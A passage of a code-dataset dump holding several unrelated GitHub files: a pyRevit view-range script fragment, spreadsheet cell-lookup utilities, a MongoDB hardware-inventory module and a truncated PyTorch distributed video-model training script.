following source to target :\")\n if len(source_list) == 1:\n view_range = source_list[0].GetViewRange()\n for target in target_list: # type:ViewPlan\n target.SetViewRange(view_range)\n logger.info(\"{} -> {}\".format(source_list[0].Name, target.Name))\n else:\n for source, target in zip(\n source_list, target_list\n ): # type:ViewPlan, ViewPlan\n target.SetViewRange(source.GetViewRange())\n logger.info(\"{} -> {}\".format(source.Name, target.Name))\n return True\n\n\nwhile copy_view_range():\n pass\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Manage.panel/Copy.pulldown/CopyViewRange.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"12143346343","text":"import re\r\n\r\nfrom . import Cell\r\n\r\n\r\ndef from_letter_base(letters):\r\n \"\"\"Tranforms a letter base number into an integer.\"\"\"\r\n n = 0\r\n for i, letter in enumerate(letters):\r\n n += (ord(letter) - 64) * pow(26, len(letters) - (i + 1))\r\n return n - 1\r\n\r\n\r\ndef find_corresponding_cell_best_effort(cells, base_cell, max_difference_with_base=0):\r\n default_cell = Cell(-1, -1, \"\")\r\n for y in base_cell.y_merge_range:\r\n for row in cells:\r\n for cell in row:\r\n if cell.x <= base_cell.x:\r\n continue\r\n if max_difference_with_base > 0 and cell.x > base_cell.x + max_difference_with_base:\r\n continue\r\n if cell.y == y and cell:\r\n return cell\r\n elif cell.y == base_cell.y and default_cell.x == -1:\r\n default_cell = cell\r\n return default_cell\r\n\r\n\r\ndef find_corresponding_cell_best_effort_from_range(spreadsheet, range_name, base_cell, max_difference_with_base=0):\r\n range_cells = spreadsheet.get_range(range_name)\r\n corresponding_cell = find_corresponding_cell_best_effort(range_cells, base_cell, max_difference_with_base)\r\n if corresponding_cell.x == -1 and range_name:\r\n worksheet, range_name = spreadsheet.get_worksheet_and_range(range_name)\r\n cells = worksheet.cells\r\n splitted_range = range_name.split(\":\")[0]\r\n column = re.split(r\"(\\d+)\", splitted_range)[0] # TODO: handle all kind of ranges\r\n column = from_letter_base(column)\r\n while len(cells) <= base_cell.y: # TODO: handle different y from base_cell\r\n cells.append([])\r\n while len(cells[base_cell.y]) <= column:\r\n cells[base_cell.y].append(Cell(len(cells[base_cell.y]), base_cell.y, \"\"))\r\n corresponding_cell = cells[base_cell.y][column]\r\n return corresponding_cell\r\n\r\n\r\ndef find_corresponding_cells_best_effort(cells, ys, base_cell, max_difference_with_base=0, filled_only=True):\r\n default_cells = []\r\n corresponding_cells = []\r\n for y in ys:\r\n for row in cells:\r\n for cell in row:\r\n if cell.x <= base_cell.x:\r\n continue\r\n if max_difference_with_base > 0 and cell.x > base_cell.x + max_difference_with_base:\r\n continue\r\n if cell.y == y:\r\n if not filled_only or cell:\r\n corresponding_cells.append(cell)\r\n if cell.y == base_cell.y:\r\n default_cells.append(cell)\r\n if not corresponding_cells:\r\n return default_cells\r\n return corresponding_cells\r\n\r\n\r\ndef find_corresponding_qualifier_cells_best_effort(\r\n spreadsheet, cells, base_cell, max_difference_with_base=0, filled_only=True\r\n):\r\n default_cells = []\r\n corresponding_cells = []\r\n last_y = -1\r\n all_x = set()\r\n first_x = -1\r\n for row in cells:\r\n for cell in row:\r\n last_y = cell.y\r\n if cell.x <= base_cell.x:\r\n continue\r\n elif first_x < 0:\r\n first_x = 
cell.x\r\n if max_difference_with_base > 0 and cell.x >= first_x + max_difference_with_base:\r\n continue\r\n if cell.y in base_cell.y_merge_range and (not filled_only or cell):\r\n corresponding_cells.append(cell)\r\n all_x.add(cell.x)\r\n if cell.y == base_cell.y:\r\n default_cells.append(cell)\r\n if not filled_only:\r\n y = last_y + 1\r\n all_x = sorted(all_x)\r\n worksheet = spreadsheet.get_worksheet()\r\n while y <= max(base_cell.y_merge_range):\r\n new_row = []\r\n for x in all_x:\r\n new_row.append(Cell(x, y, \"\"))\r\n worksheet.cells.append(new_row)\r\n corresponding_cells = [*corresponding_cells, *new_row]\r\n y += 1\r\n if not corresponding_cells:\r\n return default_cells\r\n return corresponding_cells\r\n\r\n\r\ndef find_corresponding_cells_best_effort_from_range(\r\n spreadsheet, range_name, base_cell, max_difference_with_base=0, filled_only=True\r\n):\r\n range_cells = spreadsheet.get_range(range_name)\r\n corresponding_cells = find_corresponding_cells_best_effort(\r\n range_cells, base_cell.y_merge_range, base_cell, max_difference_with_base, filled_only\r\n )\r\n if not filled_only and not corresponding_cells and range_name:\r\n worksheet, range_name = spreadsheet.get_worksheet_and_range(range_name)\r\n cells = worksheet.cells\r\n splitted_range = range_name.split(\":\")[0]\r\n column, _, _ = re.split(r\"(\\d+)\", splitted_range) # TODO: handle all kind of ranges\r\n column = from_letter_base(column)\r\n max_y = base_cell.y_merge_range[-1]\r\n while len(cells) <= max_y: # TODO: handle different y from base_cell\r\n cells.append([])\r\n while len(cells[max_y]) <= column:\r\n cells[max_y].append(Cell(len(cells[max_y]), max_y, \"\"))\r\n return find_corresponding_cells_best_effort(\r\n spreadsheet.get_range(range_name),\r\n base_cell.y_merge_range,\r\n base_cell,\r\n max_difference_with_base,\r\n filled_only,\r\n )\r\n return corresponding_cells\r\n\r\n\r\ndef check_range(cell_range):\r\n \"\"\"Checks if the range is valid.\"\"\"\r\n range_regex = r\"([A-Z]+\\d*|\\d+)(:([A-Z]+\\d*|\\d+))?\"\r\n if not re.match(r\"^\" + range_regex + r\"((,| |, |;|; |\\|)\" + range_regex + r\")*$\", cell_range):\r\n return False\r\n return True\r\n\r\n\r\ndef extract_spreadsheet_id(string):\r\n \"\"\"Extracts the sprreadsheet id from an url.\"\"\"\r\n if \"/edit\" in string:\r\n string = string.split(\"/edit\")[0]\r\n if \"/\" in string:\r\n string = string.rstrip(\"/\")\r\n string = string.split(\"/\")[-1]\r\n string = string.split(\"&\")[0]\r\n string = string.split(\"#\")[0]\r\n return string\r\n","repo_name":"SpartanPlume/Tosurnament","sub_path":"backend/common/api/spreadsheet/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"20464896231","text":"import pymongo\nimport toml\n\nDEFAULT_STATUSES = [\"Нет\", \"Списано\", \"Утилизировано\"]\nDEFAULT_HARDWARE_TYPES = [\n \"ПК\",\n \"Принтер\",\n \"Камера видеонаблюдения\",\n \"Монитор\",\n \"Аудиосистема\",\n \"Монитор\",\n \"Проектор\",\n \"Маршрутизатор\"\n]\n\ntable_fields = {\n 'inv_num': {'type': 'input', 'show': 'Инвертарный номер'},\n 'type': {'type': 'dropdown', 'show': 'Тип', 'elements': \"metadata.hardware_types\"},\n 'vendor': {'type': 'input', 'show': 'Производитель'},\n 'model': {'type': 'input', 'show': 'Модель'},\n 'serial': {'type': 'input', 'show': 'Серийный номер'},\n 'status': {'type': 'dropdown', 'show': 'Статус', 'elements': \"metadata.statuses\"},\n 'employee': {'type': 'dropdown', 'show': 
'Отвественный', 'elements': \"employees\"},\n 'description': {'type': 'textbox', 'show': 'Описание'},\n}\n\nemployees_table_fields = {\n 'surname': {'type': 'input', 'show': 'Фамилия'},\n 'name': {'type': 'input', 'show': 'Имя'},\n 'patronymic': {'type': 'input', 'show': 'Отчество'},\n 'hpart_name': {'type': 'dropdown', 'show': 'Отдел', 'elements': \"hparts.name\"}\n}\n\nhparts_table_fields = {\n 'id': {'type': 'input', 'show': 'ID'},\n 'name': {'type': 'input', 'show': 'Название'},\n}\n\nmetadata = {\n 'statuses': DEFAULT_STATUSES,\n 'hardware_types': DEFAULT_HARDWARE_TYPES\n}\n\nclass Hardware:\n def __init__(self, inv_num, type_, vendor, model, serial, description, employee, status = \"Нет\"):\n self.inv_num = inv_num\n self.type = type_\n self.vendor = vendor\n self.model = model\n self.serial = serial\n self.status = status\n self.employee = employee\n self.description = description\n\nclass HPart:\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\nclass Employee:\n def __init__(self, id, surname, name, patronymic, hpart_id):\n self.id = id\n self.surname = surname\n self.name = name\n self.patronymic = patronymic\n self.hpart_id = hpart_id\n\nclass Database:\n def __init__(self) -> None:\n try:\n self.config = toml.load(\"../config.toml\")['server']\n except:\n self.config = toml.load(\"config.toml\")['server']\n\n\n self.addr = self.config['address']\n\n self.connection = pymongo.MongoClient(self.addr)\n\n self.db = self.connection.hardware\n\n self.hardware_table = self.db.hwtable # Устройства\n self.table_fields = self.db.table_fields # Описание полей таблиц\n self.metadata = self.db.metadata # Дополнительные данные\n\n self.employees = self.db.employees # Сотрудники\n self.employees_table_fields = self.db.employees_table_fields # Сотрудники\n \n self.hparts = self.db.hparts # Отделы\n self.hparts_table_fields = self.db.hparts_table_fields # Сотрудники\n\n # Настройка\n def setup(self):\n self.table_fields.insert_one(table_fields)\n self.employees_table_fields.insert_one(employees_table_fields)\n self.hparts_table_fields.insert_one(hparts_table_fields)\n self.metadata.insert_one(metadata)\n\n # Очистка всей БД\n def clean_db(self):\n \"Remove every collection data to make a clean DB\"\n self.table_fields.delete_many({})\n self.employees_table_fields.delete_many({})\n self.hparts_table_fields.delete_many({})\n\n self.hardware_table.delete_many({})\n self.metadata.delete_many({})\n \n self.employees.delete_many({})\n self.hparts.delete_many({})\n\n def is_inv_num_free(self, num: int):\n return not (num in [i['inv_num'] for i in self.get_all()])\n\n def get_hpart_id_by_name(self, name: str):\n for i in self.hparts.find({}):\n if i[\"name\"] == name:\n return i[\"id\"]\n\n def evaluate_fields(self, fields_name):\n \"Evaluate links in values\"\n\n if not list(self.db[fields_name].find({})):\n return {}\n\n # Get data from `fields_name`\n data: dict = list(self.db[fields_name].find({}))[0]\n\n # Go through data and if we get string in `elements` key, get following field (by string) from db.\n for k, v in data.items():\n if type(v) is dict and v['type'] == \"dropdown\":\n # FIXME\n if k == \"hpart_name\":\n data[k]['elements'] = [i['name'] for i in self.hparts.find({})]\n continue\n elif k == \"employee\":\n data[k][\"elements\"] = [f\"{i['surname']} {i['name']} {i['patronymic']}\" for i in self.employees.find({})]\n continue\n\n keys = v['elements'].split(\".\")\n\n temp = list(self.db[keys[0]].find({}))[0]\n del keys[0]\n\n for i in keys:\n temp = temp[i]\n \n 
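# at this point temp holds the list resolved from the dotted reference,\n            # e.g. \"metadata.statuses\" -> [\"Нет\", \"Списано\", \"Утилизировано\"]\n            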
data[k]['elements'] = temp\n \n del data['_id']\n\n return data\n\n def add_hardware(self, hardware: Hardware):\n # INV NUMS should not repeat!\n\n invs = [i['inv_num'] for i in self.get_all()]\n\n if hardware.inv_num in invs:\n raise ValueError(f\"Inventory number should not repeat! (Hint: Delete device and add device again) [{hardware.inv_num}]\")\n\n self.hardware_table.insert_one(hardware.__dict__)\n\n def add_hpart(self, hpart: HPart):\n self.hparts.insert_one(hpart.__dict__)\n\n def add_employee(self, employee: Employee):\n if employee.id in [i['id'] for i in self.employees.find()]:\n raise ValueError(f\"Employee ID should not repeat! ({employee.id})\")\n \n self.employees.insert_one(employee.__dict__)\n\n def get_all(self):\n return self.hardware_table.find()\n\n def get_from_length(self, start, length):\n return self.hardware_table.find().skip(start).limit(length)\n\n # def get_by_vendor(self, vendor: str):\n # return [i for i in self.hardware_table.find() if i['vendor'].lower() == vendor.lower()]\n \n # def get_by_name(self, name: str):\n # return [i for i in self.hardware_table.find() if i['name'].lower() == name.lower()]\n \n # def get_by_model(self, model: str):\n # return [i for i in self.hardware_table.find() if i['model'].lower() == model.lower()]\n \n # def get_by_serial(self, serial: str):\n # return [i for i in self.hardware_table.find() if i['serial'].lower() == serial.lower()]\n \n # def get_by_status(self, status: int):\n # return [i for i in self.hardware_table.find() if i['status'] == status]\n\n # def get_by_inv_num(self, inv_num: int):\n # return [i for i in self.hardware_table.find() if i['inv_num'] == inv_num]\n\n # def get_by_type(self, type_: str):\n # return [i for i in self.hardware_table.find() if i['type'].lower() == type_.lower()]\n\n\nif __name__ == \"__main__\":\n db = Database()\n\n db.clean_db()\n db.setup()\n\n # for n, i in enumerate((\"ABC\", \"DEF\", \"GHI\")):\n # db.add_hpart(HPart(n, i))\n\n # for n, i in enumerate((\"Clark\", \"Max\", \"Drew\", \"Eric\", \"Mark\", \"David\")):\n # db.add_employee(Employee(n, \"Markin\", i, \"Eduardovich\", 0))\n\n # db.add_employee(Employee(99, \"Thunder\", \"Zeraora\", \"-----------\", 1))\n\n # for i in range(15):\n # hw_ = Hardware(800 + i, \"Аудиосистема\", \"ByteSaver\", \"LAVI-W\", \"UT0\" + str(i), \"2 TB Hard Drive 100 MB/s\", \"Thunder Zeraora ------------\")\n\n # db.add_hardware(hw_)\n","repo_name":"NDRAEY/HardwareDatabase","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36073833828","text":"import warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport os\nfrom os.path import expanduser\nimport sys\nimport time\nimport multiprocessing\n\nimport torch.nn.parallel\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nfrom torch.nn.utils import clip_grad_norm_\nimport torch.nn.functional as f\nfrom ops.dataset import TSNDataSet\nfrom ops.models_gate import TSN_Gate\nfrom ops.models_ada import TSN_Ada\nfrom ops.transforms import *\nfrom ops import dataset_config\nfrom ops.utils import AverageMeter, accuracy, cal_map, Recorder, verb_noun_accuracy, get_marginal_output\nfrom opts import parser\n\nfrom tensorboardX import SummaryWriter\nfrom ops.my_logger import Logger\n\nfrom tools.net_flops_table import get_gflops_params, feat_dim_dict\n\n#distributed\nimport platform\nimport torch.multiprocessing as mp\nimport 
torch.distributed as dist\n\n# TODO(yue)\nimport numpy as np\nimport common\nfrom os.path import join as ospj\nfrom shutil import copyfile\nimport shutil\nimport pickle\n\ndef main():\n args = parser.parse_args()\n common.set_manual_data_path(args.data_path, args.exps_path)\n\n #TODO(distributed)\n if args.hostfile != '':\n curr_node_name = platform.node().split(\".\")[0]\n with open(args.hostfile) as f:\n nodes = [x.strip() for x in f.readlines() if x.strip() != '']\n master_node = nodes[0].split(\" \")[0]\n for idx, node in enumerate(nodes):\n if curr_node_name in node:\n args.rank = idx\n break\n args.world_size = len(nodes)\n args.dist_url = \"tcp://{}:10598\".format(master_node)\n args.distributed = args.world_size > 1 or args.multiprocessing_distributed\n ngpus_per_node = torch.cuda.device_count() #len(args.gpus)\n\n test_mode = (args.test_from != \"\")\n if args.multiprocessing_distributed:\n args.world_size = ngpus_per_node * args.world_size\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args, test_mode))\n else:\n main_worker(args.gpus, ngpus_per_node, args, test_mode)\n\n\ndef main_worker(gpu_i, ngpus_per_node, args, test_mode):\n args.gpus = gpu_i\n if args.multiprocessing_distributed or args.distributed:\n node_seed_offset = 10086 * args.rank\n else:\n node_seed_offset = 0\n if args.train_random_seed<0:\n args.train_random_seed = args.random_seed\n set_random_seed(node_seed_offset + args.random_seed, args)\n\n args.num_class, args.train_list, args.val_list, args.root_path, prefix = \\\n dataset_config.return_dataset(args.dataset,\n args.data_path) # TODO this is only used if manually set\n\n # TODO(distributed)\n if args.gpus is not None:\n print(\"Use GPU: {} for training\".format(args.gpus))\n if args.distributed:\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n if args.multiprocessing_distributed:\n # For multiprocessing distributed training, rank needs to be the uniform rank among all the processes\n args.rank = args.rank * ngpus_per_node + args.gpus\n dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n\n if args.rank == 0:\n logger = Logger()\n sys.stdout = logger\n\n if args.ada_reso_skip:\n model = TSN_Gate(args=args)\n else:\n model = TSN_Ada(args=args)\n base_model_gflops, gflops_list, g_meta = init_gflops_table(model, args)\n\n if args.no_optim:\n policies = [{'params': model.parameters(), 'lr_mult': 1, 'decay_mult': 1, 'name': \"parameters\"}]\n else:\n policies = model.get_optim_policies()\n\n optimizer = torch.optim.SGD(policies, args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n # TODO(distributed)\n if args.distributed:\n # For multiprocessing distributed, DistributedDataParallel constructor\n # should always set the single device scope, otherwise,\n # DistributedDataParallel will use all available devices.\n if args.gpus is not None and not isinstance(args.gpus, list):\n torch.cuda.set_device(args.gpus)\n model.cuda(args.gpus)\n # When using a single GPU per process and per\n # DistributedDataParallel, we need to divide the batch size\n # ourselves based on the total number of GPUs we have\n # the batch size should be divided by number of nodes as well\n args.batch_size = int(args.batch_size / args.world_size)\n args.workers = int(args.workers / ngpus_per_node)\n\n if args.sync_bn:\n process_group = torch.distributed.new_group(list(range(args.world_size)))\n model = 
torch.nn.SyncBatchNorm.convert_sync_batchnorm(model, process_group)\n\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpus], find_unused_parameters=True)\n else:\n model.cuda()\n # DistributedDataParallel will divide and allocate batch_size to all\n # available GPUs if device_ids are not set\n model = torch.nn.parallel.DistributedDataParallel(model, find_unused_parameters=True)\n # elif args.gpus is not None:\n # torch.cuda.set_device(args.gpus)\n # model = model.cuda(args.gpus)\n else:\n # DataParallel will divide and allocate batch_size to all available GPUs\n # assign rank to 0\n model = torch.nn.DataParallel(model, device_ids=args.gpus).cuda()\n args.rank = 0\n\n handle_frozen_things_in(model, args)\n\n if args.resume:\n if os.path.isfile(args.resume):\n # TODO s\n if args.rank==0:\n print((\"=> loading checkpoint '{}'\".format(args.resume)))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n # best_prec1 = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n if args.rank == 0:\n print((\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch'])))\n else:\n if args.rank == 0:\n print((\"=> no checkpoint found at '{}'\".format(args.resume)))\n\n # TODO(yue) loading pretrained weights\n elif test_mode or args.base_pretrained_from != \"\" or args.use_tsmk8 or args.use_segk8 or args.use_tsmk16:\n if args.use_segk8:\n the_model_path = expanduser(\n \"~/.cache/torch/checkpoints/TSM_kinetics_RGB_resnet50_avg_segment5_e50.pth\")\n elif args.use_tsmk8:\n the_model_path = expanduser(\n \"~/.cache/torch/checkpoints/TSM_kinetics_RGB_resnet50_shift8_blockres_avg_segment8_e50.pth\")\n elif args.use_tsmk16:\n the_model_path = expanduser(\n \"~/.cache/torch/checkpoints/TSM_kinetics_RGB_resnet50_shift8_blockres_avg_segment16_e50.pth\")\n else:\n the_model_path = args.base_pretrained_from\n if test_mode:\n the_model_path = ospj(args.test_from, \"models\", \"ckpt.best.pth.tar\")\n the_model_path = common.EXPS_PATH + \"/\" + the_model_path\n\n sd = torch.load(the_model_path)['state_dict']\n sd = take_care_of_pretraining(sd, args)\n\n model_dict = model.state_dict()\n model_dict.update(sd)\n model.load_state_dict(model_dict)\n\n cudnn.benchmark = True\n\n train_loader, val_loader = get_data_loaders(model, prefix, args)\n # define loss function (criterion) and optimizer\n # if args.gpus is not None: #args.distributed\n # criterion = torch.nn.CrossEntropyLoss().cuda(args.gpus)\n # else:\n criterion = torch.nn.CrossEntropyLoss().cuda()\n\n if args.rank==0:\n exp_full_path = setup_log_directory(args.exp_header, test_mode, args, logger)\n # TODO stat runtime info\n import socket\n import getpass\n print(\"%s@%s started the experiment at %s\"%(getpass.getuser(), socket.gethostname(), logger._timestr))\n\n if not test_mode:\n with open(os.path.join(exp_full_path, 'args.txt'), 'w') as f:\n f.write(str(args))\n tf_writer = SummaryWriter(log_dir=exp_full_path)\n else:\n tf_writer = None\n\n # TODO(yue)\n if args.rank == 0:\n map_record, mmap_record, prec_record, prec5_record = get_recorders(4)\n if args.dataset == \"epic\":\n verb_prec1_record, verb_prec5_record, noun_prec1_record, noun_prec5_record = get_recorders(4)\n best_train_usage_str = None\n best_val_usage_str = None\n\n for epoch in range(args.start_epoch, args.epochs):\n # train for one epoch\n if not args.skip_training:\n set_random_seed(node_seed_offset + args.train_random_seed + epoch, args)\n 
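# re-seed once per epoch (offset per node via node_seed_offset) so data\n            # shuffling stays reproducible across restarts while differing between nodes\n            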
adjust_learning_rate(optimizer, epoch, -1, -1, args.lr_type, args.lr_steps, args)\n train_usage_str = train(train_loader, model, criterion, optimizer, epoch, base_model_gflops, gflops_list, g_meta, args, tf_writer)\n\n torch.cuda.empty_cache()\n if args.distributed:\n dist.barrier()\n\n # evaluation\n if (epoch + 1) % args.eval_freq == 0 or epoch == args.epochs - 1:\n set_random_seed(args.random_seed, args)\n mAP, mmAP, prec1, prec5, val_usage_str, epic_precs = \\\n validate(val_loader, model, criterion, epoch, base_model_gflops, gflops_list, g_meta, exp_full_path, args, tf_writer)\n\n if args.distributed:\n dist.barrier()\n\n # remember best prec@1 and save checkpoint\n if args.rank == 0:\n map_record.update(mAP)\n mmap_record.update(mmAP)\n prec_record.update(prec1)\n prec5_record.update(prec5)\n if args.dataset == \"epic\":\n verb_prec1_record.update(epic_precs[0])\n verb_prec5_record.update(epic_precs[1])\n noun_prec1_record.update(epic_precs[2])\n noun_prec5_record.update(epic_precs[3])\n\n best_by = {\"map\": map_record, \"mmap\": mmap_record, \"acc\": prec_record}\n if best_by[args.choose_best_by].is_current_best():\n best_train_usage_str = train_usage_str if not args.skip_training else \"(Eval Mode)\"\n best_val_usage_str = val_usage_str\n\n epic_str = \"\"\n if args.dataset == \"epic\":\n epic_str = \"V@1:%.3f V@5:%.3f N@1:%.3f N@5:%.3f\" % (\n verb_prec1_record.best_val, verb_prec5_record.best_val,\n noun_prec1_record.best_val, noun_prec5_record.best_val\n )\n\n print('Best mAP: %.3f (epoch=%d)\\tBest mmAP: %.3f(epoch=%d)\\tBest Prec@1: %.3f (epoch=%d) w. Prec@5: %.3f %s' % (\n map_record.best_val, map_record.best_at,\n mmap_record.best_val, mmap_record.best_at,\n prec_record.best_val, prec_record.best_at,\n prec5_record.at(prec_record.best_at), epic_str\n ))\n\n if args.skip_training:\n break\n\n if args.rank==0:\n tf_writer.add_scalar('acc/test_top1_best', prec_record.best_val, epoch)\n saved_things = {\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_prec1': prec_record.best_val,\n 'prec5_at_best_prec1': prec5_record.at(prec_record.best_at),\n 'best_mmap': mmap_record.best_val,\n 'best_map': map_record.best_val,\n }\n\n save_checkpoint(saved_things, prec_record.is_current_best(), False, exp_full_path, \"ckpt.best\")\n save_checkpoint(saved_things, True, False, exp_full_path, \"ckpt.latest\")\n\n if epoch in args.backup_epoch_list:\n save_checkpoint(None, False, True, exp_full_path, str(epoch))\n\n torch.cuda.empty_cache()\n\n if args.distributed:\n dist.barrier()\n\n # after fininshing all the epochs\n if args.rank == 0:\n if test_mode:\n os.rename(logger._log_path, ospj(logger._log_dir_name, logger._log_file_name[:-4] +\n \"_mm_%.2f_a_%.2f_f.txt\" % (mmap_record.best_val, prec_record.best_val)))\n else:\n if args.ada_reso_skip:\n print(\"Best train usage:%s\\nBest val usage:%s\" % (best_train_usage_str, best_val_usage_str))\n\n\ndef set_random_seed(the_seed, args):\n if args.random_seed >= 0:\n np.random.seed(the_seed)\n torch.manual_seed(the_seed)\n\n\ndef init_gflops_table(model, args):\n if \"cgnet\" in args.arch:\n base_model_gflops = 1.8188 if \"net18\" in args.arch else 4.28\n params = get_gflops_params(args.arch, args.reso_list[0], args.num_class, -1, args=args)[1]\n else:\n base_model_gflops, params = get_gflops_params(args.arch, args.reso_list[0], args.num_class, -1, args=args)\n\n if args.ada_reso_skip:\n gflops_list = model.base_model.count_flops((1, 1, 3, args.reso_list[0], 
args.reso_list[0]))\n if \"AdaBNInc\" in args.arch:\n gflops_list, g_meta = gflops_list\n else:\n g_meta = None\n if args.rank==0:\n print(\"Network@%d (%.4f GFLOPS, %.4f M params) has %d blocks\" % (args.reso_list[0], base_model_gflops, params, len(gflops_list)))\n for i, block in enumerate(gflops_list):\n print(\"block\", i, \",\".join([\"%.4f GFLOPS\" % (x / 1e9) for x in block]))\n return base_model_gflops, gflops_list, g_meta\n else:\n if args.rank == 0:\n print(\"Network@%d (%.4f GFLOPS, %.4f M params)\" % (args.reso_list[0], base_model_gflops, params))\n return base_model_gflops, None, None\n\ndef compute_gflops_by_mask(mask_tensor_list, base_model_gflops, gflops_list, g_meta, args):\n # TODO: -> conv1 -> conv2 -> // inside the block\n # TODO: C0 - C1 - C2 // channels proc.\n # TODO: C1 = s0 + s1 + s2 // 0-zero out / 1-history / 2-current cheap <<< expensive\n # TODO: saving = s1/C1 * [FLOPS(conv1)] + s0/C1 * [FLOPS(conv1) + FLOPS(conv2)]\n upperbound_gflops = base_model_gflops\n real_gflops = base_model_gflops\n\n if \"bate\" in args.arch:\n for m_i, mask in enumerate(mask_tensor_list):\n #compute precise GFLOPS\n upsave = torch.zeros_like(mask[:, :, :, 0]) # B*T*C*K->B*T*C\n for t in range(mask.shape[1]-1):\n if args.gate_history:\n upsave[:, t] = (1 - mask[:, t, :, -1]) * (1 - mask[:, t + 1, :, -2])\n else:\n upsave[:, t] = 1 - mask[:, t, :, -1] # since no reusing, as long as not keeping, save from upstream conv\n upsave[:, -1] = 1 - mask[:, -1, :, -1] # use the last frame's keep-mask here (not the stale loop variable t)\n upsave = torch.mean(upsave)\n\n if args.gate_no_skipping: # downstream conv gflops' saving is from skippings\n downsave = upsave * 0\n else:\n downsave = torch.mean(mask[:, :, :, 0])\n\n conv_offset = 0\n real_count = 1.\n if args.dense_in_block:\n layer_i = m_i // 2 # because we have twice masks as the #(blocks)\n if m_i % 2 == 1: # means we come to the second mask in the block\n if \"net50\" in args.arch or \"net101\" in args.arch: # because we have 3 convs in BottleNeck\n conv_offset = 1\n else: # because we can't compute flops saving among blocks (due to residual op), so we skip this (as this is the case only in BasicBlock)\n real_count = 0\n else:\n layer_i = m_i\n up_flops = gflops_list[layer_i][0 + conv_offset] / 1e9\n down_flops = gflops_list[layer_i][1 + conv_offset] * real_count / 1e9\n embed_conv_flops = gflops_list[layer_i][-1] * real_count / 1e9\n\n upperbound_gflops = upperbound_gflops - downsave * (down_flops - embed_conv_flops) # in worst case, we only compute saving from downstream conv\n real_gflops = real_gflops - upsave * up_flops - downsave * (down_flops - embed_conv_flops)\n elif \"AdaBNInc\" in args.arch:\n for m_i, mask in enumerate(mask_tensor_list):\n # print(\"m_i=\",m_i)\n upsave = torch.zeros_like(mask[:, :, :, 0]) # B*T*C*K->B*T*C\n for t in range(mask.shape[1]-1):\n if args.gate_history:\n upsave[:, t] = (1 - mask[:, t, :, -1]) * (1 - mask[:, t + 1, :, -2])\n else:\n upsave[:, t] = 1 - mask[:, t, :, -1] # since no reusing, as long as not keeping, save from upstream conv\n upsave[:, -1] = 1 - mask[:, -1, :, -1] # use the last frame's keep-mask here (not the stale loop variable t)\n upsave = torch.mean(upsave, dim=[0,1]) # -> C\n\n # TODO 0->1 (dim 352)\n # TODO 2->3->4 (dim 320)\n # TODO maxpool (dim 224)\n\n # TODO 0 (dim 352)\n # TODO 1->2 (dim 320)\n # TODO 3->4->5 (dim 224)\n # TODO 6 (dim 128) total=1024\n if len(gflops_list[m_i]) == 7:\n _a,_b,_c,_d = g_meta[m_i]\n upsaves = [torch.mean(upsave[:_a]),\n torch.mean(upsave[_a:_a + _b]),\n torch.mean(upsave[_a + _b:_a + _b + _c]),\n torch.mean(upsave[_a + _b + _c:])]\n out_corr_list = [0, 2, 5, 6] # to the id of last 
convs in each partition\n if m_i < len(gflops_list)-1 and len(gflops_list[m_i+1]) == 5:\n next_in_corr_list = [0, 2]\n else:\n next_in_corr_list = [0, 1, 3, 6]\n # print(_a, _a + _b, _a+_b+_c, \"channel=\", upsave.shape)\n elif len(gflops_list[m_i]) == 5:\n _a, _b, _c= g_meta[m_i]\n # print(_a, _a+_b, \"channel=\", upsave.shape)\n upsaves = [torch.mean(upsave[:_a]),\n torch.mean(upsave[_a:_a+_b]),\n torch.mean(upsave[_a+_b:])]\n out_corr_list = [1, 4] # to the id of last convs in each partition\n next_in_corr_list = [0, 1, 3, 6]\n # print(\"upsaves\",[xx.item() for xx in upsaves])\n up_flops_save = sum([upsaves[f_i] * gflops_list[m_i][out_corr_list[f_i]] for f_i in range(len(out_corr_list))]) / 1e9\n # print(\"up_flops_save\", up_flops_save.item())\n if args.gate_no_skipping: # downstream conv gflops' saving is from skippings\n downsave = upsaves[0] * 0\n else:\n downsave = torch.mean(mask[:, :, :, 0])\n # print(\"downsave\", downsave.item())\n down_flops_save = up_flops_save * 0\n if m_i < len(mask_tensor_list)-1:\n # to the id of first convs in each partition in the next layer\n down_flops_save = downsave * sum([gflops_list[m_i+1][next_in_corr_list[f_i]] for f_i in range(len(next_in_corr_list))]) / 1e9\n # print(\"down_flops_save\", down_flops_save.item())\n upperbound_gflops = upperbound_gflops - down_flops_save\n real_gflops = real_gflops - up_flops_save - down_flops_save\n # print(upperbound_gflops.item(),real_gflops.item())\n else:\n # s0 for sparsity savings\n # s1 for history\n # print(mask_tensor_list)\n # for mask in mask_tensor_list:\n # print(torch.sum(mask[:, :, 1]), torch.sum(mask[:, :, 0]), torch.sum(mask[:, :, 1]) / torch.sum(mask[:, :, 0]))\n s0 = [1 - 1.0 * torch.sum(mask[:, :, 1]) / torch.sum(mask[:, :, 0]) for mask in mask_tensor_list]\n\n if args.dense_in_block:\n savings0 = sum([s0[i*2] * gflops_list[i][0] * (1 - 1.0 / args.partitions) for i in range(len(gflops_list))])\n savings1 = sum([s0[i*2+1] * gflops_list[i][1] * (1 - 1.0 / args.partitions) for i in 